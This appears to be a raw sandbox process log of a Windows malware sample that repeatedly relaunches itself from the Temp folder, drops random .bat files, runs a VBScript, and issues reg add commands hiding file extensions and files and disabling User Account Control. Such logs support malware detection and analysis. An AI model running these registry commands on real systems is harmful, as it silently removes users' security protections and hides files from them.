cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\bGMIsgEA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "509050073130948293-6711957301064952568-20929954181584499713-19448150681131563710"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-757654127485285891943926474-7935371221516344932-346087853444579376462056202"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\pyYMYsIo.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10055103729073351801612463991241610580-2102929009451084998-481767147-1455059140"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1473814112-1095765526-415136240607397240-17398757208642633512176294861078188541"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XwYUcEIw.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VYAQIUQs.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qWAYwswU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\mWgQccQk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "12373181611881470156743625981078553204-19298787195506403021222108134946997326"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-12745403921459649623-1933668423-74171583-206111197374027046-534008676870837498"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "20893184371601455554-548535690-647791583-621343248737752970535534776341205847"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\oWwYowsg.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ZKwYAoco.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "198163460688468016866760488490249361887989781582267361-85460638470127938"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PscMoscI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "572897108210899421-1299785826-1832049060-18252964662270070142949829831880110778"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LqUAUEwI.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1091867911-1665075651-740983298-132808012717646459381534720335-1552638542-513608020"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "16440877547600630-929723567-1262645582425388791-401057610-2133596987-1711779921"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tYAMIwYM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\WiMocQsc.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1443016411397321882-220976298-181631061713581303972034653263-5366349611255239690"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\kMUcMwoQ.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1371568878-588745733-1683471287-1847775336-2007614858-1663943930148179782-907210084"
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\CsgksIIA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "564829952-17615495431899509113-136199139-37135343930593173-19260617840138911"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\wkoEwoIU.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\xqIMIowM.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-214206214-653055562-1826798846757443175-204905062512795418441083579323-240164348"
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "10968801361478907797-66590486325500048517655097571929704936-749413880226439700"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\buEMYUgk.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "50853477-167858395218982061-1457323298464534548938635341-11426837491368313178"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RGwwIQIY.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\tsAcAMII.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ISoIsYIA.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe
C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\uIkIUkEE.bat" "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N.exe""
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "403325913-3213566892884305571857071040-862266412-1022699458-851454977-711194045"
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\2451f9d4132d0a7bf4861b3f3578e59ea737f0905884f1701b549b2268b317e2N"
